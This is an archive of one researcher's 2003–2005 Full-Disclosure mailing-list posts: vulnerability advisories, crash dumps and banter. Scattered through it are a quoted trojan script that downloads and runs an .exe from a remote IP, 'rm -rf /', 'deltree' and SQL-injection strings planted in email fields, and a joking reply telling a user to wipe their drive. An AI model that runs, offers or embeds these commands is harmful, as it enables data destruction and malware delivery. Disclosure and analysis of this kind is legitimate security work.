Re: [Full-Disclosure] Xfree86 video buffering?

2005-02-26 Thread KF (Lists)
video seems to address this with the vesa driver, but does add several seconds to the startup. I still need to file an official bug report but they are looking into it anyway. -KF _evil wrote: KF (lists) wrote: i've had a similar issue with a 3dfx banshee videocard and some (beta)driver under

Re: [Full-Disclosure] Xfree86 video buffering?

2005-02-25 Thread KF (lists)
I have cc'd a link for the FD-archive on this thread to the [EMAIL PROTECTED] alias... I will let you know if and when they respond. -KF Cassidy Macfarlane wrote: Yeah. In fact, imho, this should have moved off to the Xfree dev list a few posts ago.. I trust the OP or someone along the line has

Re: [Full-Disclosure] Xfree86 video buffering?

2005-02-24 Thread KF (Lists)
in the morning I catch glimpses of stuff I viewed just prior to shutting the machine down for the night. Several folks have mentioned it could be related to the ram chips on the video card. -KF ___ Full-Disclosure - We believe in it. Charter: http

Re: [Full-Disclosure] Xfree86 video buffering?

2005-02-24 Thread KF (Lists)
That is a definite common thread on my end. All three of the machines in question have the following in the X config. Driver vesa -KF Rodrigo Barbosa wrote: Looks like related to the VESA buffer, since I only saw it happen when using the VESA driver

Re: [Full-Disclosure] Release of Arkeia Network Backup 5.3.5 fixes security issue

2005-02-23 Thread KF (lists)
donwload != download. damn lesdexia. -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Xfree86 video buffering?

2005-02-23 Thread KF (lists)
, the next morning when my Girlfriend turns my computer on she gets a quick 2 second shot of my porn just before the KDM login screen. What causes this? Can it be prevented? I can certainly see sensitive data potentially being leaked via this quirk. -KF

Re: [Full-Disclosure] Xfree86 video buffering?

2005-02-23 Thread KF (Lists)
can't say if it happens while using gdm or xdm. It does not seem to be specific to any particular video card either since this happens on multiple machines. -KF

Re: [Full-Disclosure] Please can some one help out.

2005-02-22 Thread KF (Lists)
Who knows ... whats this ? http://camera3.gnax.net/view/index.shtml?videos=one what are these? http://www.google.com/search?hl=enq=%2Fview%2Findex.shtml%3Fvideos%3DonebtnG=Google+Search just non secure cameras man... -KF Tanvir wrote: Hi Can Some body tell me what is this? http

[Full-Disclosure] Speaking of UPX...

2005-02-11 Thread KF (Lists)
in ?? () #6 0x0804f5bb in ?? () #7 0x080691cb in putchar () #8 0x4013bdc6 in __libc_start_main () from /lib/libc.so.6 #9 0x08049901 in ?? () -KF

[Full-Disclosure] DMA[2005-0131a] - 'Setuid Perl PERLIO_DEBUG root owned file creation'

2005-02-07 Thread KF (lists)
- Rafael Garcia-Suarez disabled PERLIO_DEBUG in sperl 01/31/2005 08:31 AM - perl #33990] [RESOLVED] 01/31/2005 11:15 AM - perl-5.8.6-bug33990.patch passed on from Mandrake cvs 02/02/2005 05:20 PM - Alternate patch provided [EMAIL PROTECTED] -KF /* * Copyright Kevin Finisterre

[Full-Disclosure] DMA[2005-0131b] - 'Setuid Perl PERLIO_DEBUG buffer overflow'

2005-02-07 Thread KF (lists)
, perlbug, vendor-sec et al 01/31/2005 04:25 AM - Rafael Garcia-Suarez disabled PERLIO_DEBUG in sperl 01/31/2005 08:31 AM - perl #33990] [RESOLVED] 01/31/2005 11:15 AM - perl-5.8.6-bug33990.patch passed on from Mandrake cvs 02/02/2005 05:20 PM - Alternate patch provided [EMAIL PROTECTED] -KF

Re: [Full-Disclosure] Administrivia: Goodbye

2005-02-07 Thread KF (lists)
Eat a dick buddy... show some respect for the man. -KF Good Riddance.

[Full-Disclosure] DMA[2005-0125a] - 'berlios gpsd format string vulnerability'

2005-01-26 Thread KF (Lists)
); Timeline associated with this bug: 01/19/2005 attempts to notify all of the individuals working on the project via email were made. no response. 01/20/2005 BerliOS Developer bug ID #003087 Security Vulnerability ala syslog() was filed. no response. -KF /** ** Copyright Johnh and KF

Re: [Full-Disclosure] Slackware Security updates

2005-01-26 Thread KF (lists)
There is nothing yet for this year but this would be a good start... http://www.slackware.com/security/ http://www.slackware.com/lists/archive/ -KF Carlos de Oliveira wrote: Hi there! I've seen linux distributions sometimes posting here on full-disclosure it's security updates. I use slackware

[Full-Disclosure] DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid'

2005-01-26 Thread KF (Lists)
response 01/03/2005 09:17 PM - followup 01/12/2005 02:56 PM - ... 01/13/2005 08:41 PM - ... 01/19/2005 12:16 AM - confirm credit 01/20/2005 12:13 PM - immunitysec nukido release -KF

Re: [Full-Disclosure] 2 vulnerabilities combine to auto execute received files in Nokia series 60 OS

2005-01-24 Thread KF (lists)
so then the bottom line is that there is a bug. When files are being transferred they should also be identified via the content of the file rather than the extension... -KF The second one is also a known feature, the file type is not determined from the extension but from the content of the file

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread KF (lists)
Ok folks the damn sky IS NOT falling. I just checked my SUS install and I have 10 new updates... so should you. so lets all just FREAK [EMAIL PROTECTED]@# -KF Micheal Espinola Jr wrote: Nope, its the typically the 2nd Tuesday of the month. Also, they are PST. Myself being EST, I dont expect

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread KF (lists)
Do a software update check with this thing and you get GIANTAntiSpywareMain.exe listening on port 2571 until the software is closed. Feel free to beat on and fuzz that port fellas. =] -KF KF (lists) wrote: I love how the icon for this product is a big Target. Very appropriate. Anyone wanna

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread KF (lists)
I love how the icon for this product is a big Target. Very appropriate. Anyone wanna take bets on how long it takes for someone to find a hole in the Spynet p2p functions of this beast, what port is that listening on again? *grin* -KF James Patterson Wicks wrote: We knew that Microsoft

Re: [Full-Disclosure] Possible DNS compromise/poisoning?

2005-01-06 Thread KF (lists)
http://www.talkaboutsoftware.com/group/microsoft.public.windowsme.general/messages/241011.html -KF [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Is anyone else seeing this: - --SNIP-- ;; QUESTION SECTION: ;www.microsoft.com. IN A ;; ANSWER SECTION

[Full-Disclosure] DMA[2005-0103a] - 'William LeFebvre top format string vulnerability'

2005-01-04 Thread KF (Lists)
! This bug was found alive and kicking in the Solaris 10 Sun freeware package. -KF

[Full-Disclosure] Kaffeine Media Player Conteny Type overflow

2004-10-26 Thread KF
Author did not respond and I could not exploit... enjoy. there will be a proper advisory when I am not being so lazy -KF Kaffeine =0.4.2 http://kaffeine.sourceforge.net/download.html Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2 also Tested on various SuSE and Fedora

[Full-Disclosure] OT ? Microsoft Streets Trips 2005 with GPS Locator on linux

2004-10-11 Thread KF
gpsd and sniff away. /usr/local/sbin/gpsd -p /dev/ttyS0 Happy war driving. -KF

Re: [Full-Disclosure] Cool Web Search

2004-07-29 Thread KF (lists)
Try a deltree /y c:\that usually does the trick. -KF Todd Towles wrote: The creator of CWShredder claims the newest versions of CWS are very stealthy and I believe he as stopped updating the program. Therefore CWShredder isn't the best for the newest. But as far as I understood things (from

[Full-Disclosure] http://209.50.251.182/new-exploit5/

2004-07-08 Thread KF
While on vacation I ran across this on a random PC that I was using. It looks like your typical adware exploitation. http://209.50.251.182/new-exploit5/ -KF

Re: [Full-Disclosure] M$ - so what should they do?

2004-06-21 Thread KF (lists)
I suggest they change the double click to a triple click, and while we are at it how about making the default desktop wallpaper something other than light blue. -KF How about changing the .exe convention? Making a file executable by its extension probably causes a lot of opportunities

Re: [Full-Disclosure] [Fwd: Caveat Lector: Beastie Boys Evil]

2004-06-17 Thread KF (lists)
The Xbox attempts to rip your audio to the hard disk before playing it right? This CD really sounds like crap on my Xbox... I am wondering if the audio cuts in and out because of the copy protection they try to use. -KF [EMAIL PROTECTED] wrote: Original Message Subject: Caveat

[Full-Disclosure] License Check Highway Scanner.

2004-06-09 Thread KF
that are being used? Apparently the device scans vehicle license plates as they pass and it in turn searches a database containing plates of criminals and stolen cars. -KF

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread KF (lists)
! cfolaptop hellocfovmware again ctpdesktop helloctovmware! open source rules! -KF

[Full-Disclosure] Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow

2004-06-02 Thread KF (lists)
0x41414141 0x41414141 esi0x12c300 edi0x40affab8 1085274808 eip0x41414141 0x41414141 eflags 0x10246 66118 (gdb) x/1s $esp 0x40aff5f8: 'A' repeats 144 times [EMAIL PROTECTED] interbase]# ./bin/ibserver Segmentation fault -KF

Re: [Full-Disclosure] Firebird Database Remote Database Name Overflow

2004-06-01 Thread KF (lists)
So is this firebird specific or does it also impact Borland Interbase users? -KF Aviram Jenik wrote: Firebird Database Remote Database Name Overflow Article reference: http://www.securiteam.com/unixfocus/5AP0P0UCUO.html

[Full-Disclosure] Re: [ GLSA 200405-18 ] Buffer Overflow in Firebird

2004-05-27 Thread KF (lists)
Actually its more like 2 years old... http://www.securiteam.com/unixfocus/5CP0S0U7FG.html http://seclists.org/lists/bugtraq/2002/Jun/0212.html I found that AGES ago. Hell I even sat on it 6 months while attempting to get Borland to wake up (with out success). Better late than never I guess. -KF

[Full-Disclosure] Re: [ GLSA 200405-18 ] Buffer Overflow in Firebird

2004-05-26 Thread KF (lists)
If you guys are bored you may make sure that the FireBird Team fixed this one too... http://www.mail-archive.com/[EMAIL PROTECTED]/msg11512.html -KF KF (lists) wrote: Actually its more like 2 years old... http://www.securiteam.com/unixfocus/5CP0S0U7FG.html http://seclists.org/lists/bugtraq/2002

Re: [Full-Disclosure] Gentoo-announce flood

2004-05-23 Thread KF (lists)
When you cc multiple lists in the same email they tend to send out multiple copies... this is nothing new. -KF Tobias Weisserth wrote: Hi, On Sun, 2004-05-23 at 19:01, José María Mateos wrote: Hi, Are you receiving a lot of gentoo-announces mail today or is it just me? Some of them

Re: [Full-Disclosure] Gentoo-announce flood

2004-05-23 Thread KF (lists)
I am certainly not mocking anyone... no need to imply that I was. I was simply stating that this sort of thing has happened before with other vendors posts as well as other individuals posting. *flame on* we I love this list. -KF Luke Norman wrote: KF (lists) wrote: When you cc multiple

Re: [Full-Disclosure] NTP Vulnerabilities

2004-05-11 Thread KF (lists)
new or old? -KF Dante wrote: Anyone aware of any vulnerabilities/exploits with the NTP protocol?

[Full-Disclosure] outta site outta mind.

2004-05-10 Thread KF (lists)
I forgot about this one (seriously). =]. Reported to public May 2001. Patched May 2004. http://lists.netsys.com/pipermail/full-disclosure/2004-May/021178.html http://www.blacksheepnetworks.com/security/security/fulldisc/1465.html http://seclists.org/lists/vuln-dev/2002/Mar/0325.html

Re: [Full-Disclosure] Microsoft's Explorer and Internet Explorer long share name buffer overflow.

2004-04-29 Thread KF (lists)
smbd apparently likes them to be a 256 chars or less apparently. =] Apr 27 18:26:39 CloneRiot smbd[2670]: ERROR: string overflow by 1 (256 - 255) in safe_strcpy [AA] -KF Lan Guy wrote: http://lists.samba.org/archive/jcifs/2003-February/001782

Re: [Full-Disclosure] Microsoft's Explorer and Internet Explorer long share name buffer overflow.

2004-04-28 Thread KF (lists)
I have been unable to locate a good unicode return address... but thats not to say there is not one there. =] . For those of you wondering smb.conf DOES allow for characters like \x90 and other things of that nature. enjoy. -KF Paul Szabo wrote: Anyway, http://support.microsoft.com/?kbid

Re: [Full-Disclosure] Firewall solution for Windows 2003 Server

2004-04-24 Thread KF (lists)
I personally like how Visnetic lets you take Local SYSTEM rights. -KF Irwan Hadi wrote: On Sat, Apr 24, 2004 at 06:18:50PM +0200, Ondrej Krajicek wrote: Greetings to all disclosers ;), I would like to see your opinion on currently available firewall products for Windows Server 2003. I am

Re: [Full-Disclosure] Cisco LEAP exploit tool...

2004-04-14 Thread KF (lists)
http://classes.weber.edu/wireless/ -KF Jeff Schreiner wrote: 7 miles away is stretching it a bit far considering that all 802.11g wireless transmissions range between 2.4 - 2.4835 Ghz 802.11a/h/j range between 5.47 - 5.725 Ghz not only are the frequencies prone to scatter...the radio waves

Re: [Full-Disclosure] A sucker is born every day

2004-04-05 Thread KF (lists)
hehe that reminds me of when the trojaned sshd on koan had a password something along the lines of cpm_likes_crack. -KF Paul Farrow wrote: And this comes from the same person who accused schematic of the happyhacker days of being a crack addict - and threatening him with jail. long live

Re: [Full-Disclosure] Ancient Trivia: +++ath0

2004-03-17 Thread KF
+++ATH0,,,DT911 was done plenty of times I am sure. http://www.packetstormsecurity.org/9906-exploits/gin.c -KF

Re: [Full-Disclosure] Re: Multiple issues with Mac OS X AFP client

2004-02-27 Thread KF
Their non confirm / non deny policy kinda makes it difficult to talk about security stuff anyway... -KF Chris Adams wrote: On Feb 27, 2004, at 9:24, Chris Adams wrote: Multiple issues with Mac OS X AFP client Vendor Response: None After some discussion with someone on Apple's product

Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-15 Thread KF
Man ... those voices in my head... they keep screaming DMCA! -KF [EMAIL PROTECTED] wrote: I downloaded the Microsoft source code. Easy enough. It's a lot bigger than Linux, but there were a lot of people mirroring it and so it didn't take long. Anyway, I took a look, and decided that Microsoft

Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-15 Thread KF
Btw this does nothing to the IE on Win2k Version: 5.00.3700.1040, Update Versions: SP4;Q824145:Q832894 -KF KF wrote: Man ... those voices in my head... they keep screaming DMCA! -KF [EMAIL PROTECTED] wrote: I downloaded the Microsoft source code. Easy enough. It's a lot bigger than Linux

Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-15 Thread KF
please enlighten us on your versions numbers / patch levels wood. -KF morning_wood wrote: IE6 is not vulnerable, so I guess I'll get back to work. My Warhol worm will have to wait a bit... Dunno but your message crashes OE on (pre)view. no warning, no nothin... OE just *bink* closes NICE JOB

Re: [Full-Disclosure] (no subject)

2004-02-07 Thread KF
Use a friggin subject line fools! -KF

Re: [Full-Disclosure] (no subject) (use a subject fools!)

2004-02-07 Thread KF
I was simply replying to the original subject... If I changed it then it would appear as a different thread or something. Here I'll fix it in this one for ya. =] -KF Paul Schmehl wrote: --On Saturday, February 7, 2004 11:05 AM -0500 KF [EMAIL PROTECTED] wrote: Use a friggin subject line fools

Re: [Full-Disclosure] (no subject)

2004-02-07 Thread KF
[EMAIL PROTECTED] wrote: On Sat, 07 Feb 2004 11:05:38 EST, KF [EMAIL PROTECTED] said: Use a friggin subject line fools! OK.. I'll bite. What subject line do you recommend for pointless mail? ;) I could care less... so long as it is something relating to the email that is being sent. When

Re: [Full-Disclosure] home land tracker software

2004-02-06 Thread KF
Bin Laden works . =P -KF Exibar wrote: hrumph I just tried about a dozen maybe two dozen names and none produced matches. Their database can't be that big :-) William Gates George W. Bush were two names that I thought for sure would pop up something at least. anyone find a name

Re: [Full-Disclosure] MS updates question

2004-02-04 Thread KF
of them is a Service pack... after the SP install you may find that you now have 20 things to patch. Feel free to correct me if I am wrong... -KF adam.richards wrote: In Windows Update in the left column there is a section to customize Windows Update. Make sure you don't have any blocked. Adam

Re: [Full-Disclosure] sco.com - slow? :)

2004-02-01 Thread KF
Caldera.com appears to be dead also. -KF Harry Hoffman wrote: As pointed out to me by Sebastian it seems that SCO has removed the DNS entry for www.sco.com. Don't know if they planned to do that from the get-go, as no other DNS servers that I contacted have it cached. I don't know what

Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story

2004-01-31 Thread KF
Heres the other frame... htmlbodyimg src=1.jpg width=500 height=400/body/html textarea id=code style=display:none; var x = new ActiveXObject(Microsoft.XMLHTTP); x.Open(GET, http://211.19.46.20/5.exe ,0); x.Send(); var s = new ActiveXObject(ADODB.Stream); s.Mode = 3;

[Full-Disclosure] [VulnWatch] SRT2004-01-18-0747 - IBM Informix IDS 9.4 contains multiple vulnerabilities

2004-01-28 Thread KF
Secure Network Operations, Inc. http://www.secnetopscom/research Strategic Reconnaissance Team research[at]secnetops[.]com Team Lead Contact kf[at]secnetops[.]com Spam Contact`rm -rf /[EMAIL PROTECTED] Our

[Full-Disclosure] [VulnWatch] SRT2004-01-18-0747 - IBM Informix IDS 9.4 contains multiple vulnerabilities

2004-01-28 Thread KF
Secure Network Operations, Inc. http://www.secnetopscom/research Strategic Reconnaissance Team research[at]secnetops[.]com Team Lead Contact kf[at]secnetops[.]com Spam Contact`rm -rf /[EMAIL PROTECTED] Our

[Full-Disclosure] SRT2004-01-18-0747 - IBM Informix IDS 9.4 contains multiple vulnerabilities

2004-01-27 Thread KF
Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team research[at]secnetops[.]com Team Lead Contact kf[at]secnetops[.]com Spam Contact`rm -rf /[EMAIL PROTECTED] Our

[Full-Disclosure] SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM

2004-01-27 Thread KF
Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team research[at]secnetops[.]com Team Lead Contact kf[at]secnetops[.]com Spam Contact`rm -rf /[EMAIL PROTECTED] Our

[Full-Disclosure] local SYSTEM on Windows vs. local root on Unix

2004-01-19 Thread KF
I am curious to know what you folks think the differences are between obtaining local SYSTEM on a win32 box and obtaining root on a Unix machine. Same thing? Different? One is worse than the other? Which one? Why? *flame on* -KF

Re: [Full-Disclosure] Help Net Security Dot Squatting ?

2004-01-18 Thread KF
cached copy? -KF Dani Wuck wrote: Daigoku wrote: Are you able to go on the Help Net Security WebSite ? (http://www.net-security.org) When i try to connect to HNS website i'm redirected to a oingo website and you ? The expiration date of the whois is 2004-01-18, i think they have been victim

[Full-Disclosure] SRT2004-01-17-0425 - Ultr@VNC local SYSTEM access.

2004-01-17 Thread KF
Yeah I know this one is short... theres a couple more on the way with more in depth details. -KF Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team research[at]secnetops[.]com Team Lead Contact kf

[Full-Disclosure] Happy belated Personal Firewall day - SRT2004-01-17-0628 - Agnitum Optpost firewall allows Local SYSTEM access

2004-01-17 Thread KF
Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team research[at]secnetops[.]com Team Lead Contact kf[at]secnetops[.]com Spam Contact`rm -rf /[EMAIL PROTECTED] Our

Re: [Full-Disclosure] January 15 is Personal Firewall Day, help the cause

2004-01-14 Thread KF
Please remember to try and take local SYSTEM privs from a personal firewall tomorrow. =] . You may be surprised by what you find. Make sure your choice of personal firewall does not expose you to other issues. -KF [EMAIL PROTECTED] wrote: I just wanted to remind everybody that tomorrow

[Full-Disclosure] SRT2004-01-9-1022 - Symantec LiveUpdate allows local users to become SYSTEM

2004-01-12 Thread KF
As usual full details are available at http://www.secnetops.biz/research -KF Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team research[at]secnetops[.]com Team Lead Contact kf[at]secnetops[.]com Spam

Re: [Full-Disclosure] gcc: Internal compiler error: program cc1 got fatal signal 11

2004-01-08 Thread KF
I don't believe there is a need to show the resulting binary segfaulting... if gcc does not seg during the compile then its not vuln. Running the a.out I would imagine segfaults everywhere. -KF $ gcc gcc-crash.c $ ./a.out Segmentation fault

Re: [Full-Disclosure] Re: Linux kernel do_mremap() proof-of-concept exploit code

2004-01-06 Thread KF
Fedora went barf... then rebooted. -KF Daniel Husand wrote: Christophe Devine wrote: | The following program can be used to test if a x86 Linux system | is vulnerable to the do_mremap() exploit; use at your own risk. | | $ cat mremap_poc.c | This didnt do anything on my 2.4.23-grsec kernel

Re: [Full-Disclosure] Ahh shucks!!

2004-01-06 Thread KF
good god I have been getting an arse load of messages from those guys too... blah. harvest these ya assholes: (friggin FD and bugtraq harvesters) `rm -rf /[EMAIL PROTECTED] |deltree \y c:\|@secnetops.biz |rm -rf /|@secnetops.com or 1=1; drop table email;@secnetops.org -KF noconflic wrote

Re: [Full-Disclosure] Anyone else exoeriencing blasts o' port 6129 TCP?

2004-01-04 Thread KF
=195.67.100.245 /var/log/messages:Jan 2 22:14:58 SRC=167.21.229.152 /var/log/messages:Jan 3 08:49:49 SRC=216.61.103.112 /var/log/messages:Jan 3 08:49:52 SRC=216.61.103.112 -KF Jim Race wrote: Rob Schrack wrote: Oh yeah... just after Christmas, 6129 accounted for maybe 25% of the packets we submitted

[Full-Disclosure] veritas security contact?

2003-12-19 Thread KF
does anyone have a good security contact at Veritas? I am not too keen on using the http://enhancement.veritas.com/ web page to report a security hole (as suggested by their phone staff). -KF

Re: [Full-Disclosure] IE Content Manager

2003-12-17 Thread KF
Hacksaw Jim Duggan? a product name would be a good start. -KF Jim Duggan wrote: I have a system with a content manager that is enabled and obviously passworded to which the password is not known. Might anyone know where this key/enable flag is stored in registry? I'm hoping I can either just

Re: [Full-Disclosure] Saddam Hussein Captured

2003-12-14 Thread KF
I was expecting some fake IE link, some XSS or something along those lines . Tis no joke. =] -KF Gideon Rasmussen, CISSP, CFSO, CFSA, SCSA wrote: http://www.cnn.com/2003/WORLD/meast/12/14/sprj.irq.main/index.html U.S.: 'We got him' Coalition captures Saddam, 'talkative,' in raid near Tikrit

Re: [Full-Disclosure] sharing ssh session

2003-12-11 Thread KF
and other apps too. http://www.psychoid.lam3rz.de/*sshsniff*.tar.gz -KF

[Full-Disclosure] SRT2003-12-04-0723 - PLDaniels Ebola remote overflow

2003-12-04 Thread KF
I am a little behind on the web page update but regardless here is the *necessary* information. Technical details will be available by the weekend. -KF Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team [EMAIL PROTECTED] Team

Re: [Full-Disclosure] flames security group start to play , yet another vuln found (rustymemory and welshboi)

2003-12-03 Thread KF
if you are bored download unrar. -KF rustymemory wrote: By: flames.bluefox.net.nz if unshar suid; then you w00t proof of concept? [EMAIL PROTECTED]:~$ unshar -f `perl -e 'printAx2000'` AASegmentation fault [EMAIL PROTECTED]:~$ more unshar.pl #!/usr

Re: [Full-Disclosure] SRT2003-TURKEY-DAY - *novelty* - detecttr.c Trace Route detection vulnerability

2003-11-27 Thread KF
Thats odd...so why exactly did you register for access to our archives. heh. also what part of *novelty* did you not understand? have a good turkey day folks. -KF Tobias Klein wrote: *gobble* *gobble*. - LoL ? show me anyone who care about your stupid findings in useless software which nobody

[Full-Disclosure] SRT2003-TURKEY-DAY - *novelty* - detecttr.c Trace Route detection vulnerability

2003-11-26 Thread KF
*gobble* *gobble*. -KF Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team [EMAIL PROTECTED] Team Lead Contact [EMAIL PROTECTED] Our Mission

Re: [Full-Disclosure] Senseless Buffer Overflow in SNOSOFT.COM IDS Suite

2003-11-15 Thread KF
Proof of concept attached. =P gotta love a troll. -KF ---BeginMessage--- so we don't look dumb we should fix the 88 byte buffer overflow in ip-to-hex. Starting program: /root/prod-source/RSN/bin/ip-to-hex `perl -e 'print A x 88'` Ox00 Program received signal SIGSEGV, Segmentation fault

Re: [Full-Disclosure] SSH Exploit Request

2003-11-14 Thread KF
i do to... but just for the sake of argument say his corp change control process states that after a new service is installed (or updated) the system must be rebooted to make sure that the boot process was not damaged. -KF Hate to stick my nose in ths thread... but how updating SSH daemon

[Full-Disclosure] SRT2003-11-13-0218 - PCAnywhere local SYSTEM exploit

2003-11-13 Thread KF
Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team [EMAIL PROTECTED] Team Lead Contact [EMAIL PROTECTED] Our Mission: Secure

Re: [Full-Disclosure] Microsoft prepares security assault on Linux ]

2003-11-12 Thread KF
to something that was just released. there were 17 critical vulnerabilities. For Windows Server 2003, there were four. For Red Hat Linux 6, they were five to ten times higher. -KF

[Full-Disclosure] SRT2003-11-11-1151 - clamav-milter remote exploit / DoS

2003-11-12 Thread KF
Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team [EMAIL PROTECTED] Team Lead Contact [EMAIL PROTECTED] Our Mission: Secure

[Full-Disclosure] SRT2003-11-06-0710 - IBM DB2 Multiple local security issues

2003-11-07 Thread KF
lists. -KF Secure Network Operations, Inc. http://www.secnetops.com/research Strategic Reconnaissance Team [EMAIL PROTECTED] Team Lead Contact [EMAIL PROTECTED] Our Mission

Re: [Full-Disclosure] Unauthorized access in Web Wiz Forum

2003-11-07 Thread KF
try sending mails one by one... -KF Alexander Antipov wrote: What's shit? I did not send this message again! Received: from NETSYS.COM ([199.201.233.10]:55737 EHLO netsys.com smtp-auth: none TLS-CIPHER: none TLS-PEER-CN1: none) by mail.yandex.ru with ESMTP id

Re: [Full-Disclosure] SRT2003-11-02-0218 - NIPrint LPD-LPR Local Help API SYSTEM exploit

2003-11-04 Thread KF
frequently on these lists. It is NOT my fault that the lists (bugtraq / FD / et all) get into mailing loops and repeatedly forward mails that have already went out. If I recall correctly I only have ONE copy of this mailing in my out box. 2514 N Nov 04 KF ( 101) [Full-Disclosure] SRT2003

[Full-Disclosure] SRT2003-11-02-0218 - NIPrint LPD-LPR Local Help API SYSTEM exploit

2003-11-03 Thread KF
We are currently evaluating .pdf based advisory release... please let us know if you have any issues with the pdf listed below. Full details on this issue can be found at: http://www.secnetops.com/research/advisories/SRT2003-11-02-0218.pdf -KF Secure Network Operations, Inc

[Full-Disclosure] SRT2003-11-02-0115 - NIPrint LPD-LPR Remote overflow

2003-11-03 Thread KF
We are currently evaluating .pdf based advisory release... please let us know if you have any issues with the pdf listed below. Full details on this issue can be found at: http://www.secnetops.com/research/advisories/SRT2003-11-02-0115.pdf -KF Secure Network Operations, Inc. http

Re: [Full-Disclosure] SRT2003-11-02-0218 - NIPrint LPD-LPR Local Help API SYSTEM exploit

2003-11-03 Thread KF
of the page can you see the list? If not what browser are you using? If you did click the pdf and nothing happened, does your browser plugin for .pdf function on other sites? Can you simply right click and save the .pdf? Thanks for the feedback. -KF

Re: [Full-Disclosure] New variant of Nachi ?

2003-10-28 Thread KF
is consistent with a variation of the Nachi or LovSan worms. Once a host is infected, it will attempt to propagate outbound via port 445. -KF

Re: [Full-Disclosure] HTML Help API - Privilege Escalation

2003-10-24 Thread KF
or is this purely informational and intended to help those using the help functions program properly? for an example of this type of attack please see: http://securityresponse.symantec.com/avcenter/security/Content/2002.10.15.html -KF Brett Moore wrote

Re: [Full-Disclosure] Re: HTML Help API - Privilege Escalation

2003-10-24 Thread KF
Sebastian Niehaus wrote: KF [EMAIL PROTECTED] writes: [...] I would relate this type of attack to a setuid program calling system(clear) while running as root on a unix machine. This does not mean that system() is flawed rather that when implementing this call you need to be more careful

Re: [Full-Disclosure] Re: HTML Help API - Privilege Escalation

2003-10-24 Thread KF
Snot as much as you annoy me sometimes you are always there for a good laugh... people like you make this list amusing keep it up. btw... pipe those mad perl.exe skillz through netcat.exe and you are in business. *grin* -KF security snot wrote: C:\perl.exe -e ... won't help you find bugs

Re: [Full-Disclosure] Windows covert channel

2003-10-19 Thread KF
ADS? -KF James Kelly wrote: I seem to remember in the dim reaches of my memory a covert channel in the Windows file system where you could paste one file at the end of another without it being detectable when you edited the original file. can someone aim me at the right buzz phrase

Re: [Full-Disclosure] Supposed SaS encryption weak - Coments and Infor about wrong claims

2003-10-15 Thread KF
Heh watch out for that DMCA. -KF Lorenzo Hernandez Garcia-Hierro wrote: Dear Paul, I've testing your exploit ( good one ) for the supposed html encryption weak of SaS. I think you took the exploit/perl script from a developers site because SaS is using an standard of encoding, here is the proof

Re: [Full-Disclosure] Re: Netscape Bug Bounty

2003-10-06 Thread KF
Oh yeah it was LSD http://msgs.securepoint.com/cgi-bin/get/bugtraq0211/255.html that sucks... get stiffed by PitBull and Netscape both. -KF KF wrote: Didn't they *forget* to pay someone at least once? -KF zen-parse wrote: Hi, There used to be a cash reward for researchers finding security

Re: [Full-Disclosure] Re: Netscape Bug Bounty

2003-10-06 Thread KF
Didn't they *forget* to pay someone at least once? -KF zen-parse wrote: Hi, There used to be a cash reward for researchers finding security bugs in Netscape products. Does anyone know if they still offer the cash? According to an email I got this morning, yes they do. And a quick google http

Re: [Full-Disclosure] bugtraq.com

2003-10-04 Thread KF
I am going to laugh when symantec sues you folks for squatting. =] -KF Jonathan A. Zdziarski wrote: Wouldn't it be more appropriate to register bugtraq.biz? On Sat, 2003-10-04 at 00:25, c.ayala wrote: They don't take checks? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL

Re: [Full-Disclosure] Mystery DNS Changes

2003-10-02 Thread KF
Linux Mozilla is happy with it... perhaps its time for a switch? =] -KF Schmehl, Paul L wrote: -Original Message- From: Andre Ludwig [mailto:[EMAIL PROTECTED] Sent: Wednesday, October 01, 2003 10:42 PM To: '[EMAIL PROTECTED]'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Mystery DNS

Re: [Full-Disclosure] Google FILTERS searches for possible DMCA infringable content!!!

2003-10-01 Thread KF
http://www.google.com/dmca.html -KF

Re: [Full-Disclosure] CERT Employee Gets Owned [Way Off Topic]

2003-09-24 Thread KF
felt his work for CERT was up to snuff... nothing more nothing less. GET OVER IT! -KF CISSP / CCNA / A+ Certified - www.unixclan.net/~kf/ security snot wrote: Sure, knowing that CERT/Honeynet is a bunch of pedophiles (and that the behavior is sanctioned by Snosoft.com - that's right folks, Snosoft

Re: [Full-Disclosure] new ssh exploit?

2003-09-18 Thread KF
=1108546328, event=OOP_READ, data=0x809ba08) at io.c:134 #15 0x40084dcf in oop_sys_run (sys=0x808ef28) at sys.c:372 #16 0x08055065 in io_run () at io.c:331 #17 0x0804b442 in main (argc=1, argv=0xb4e4) at lshd.c:1116 #18 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6 -KF KF wrote
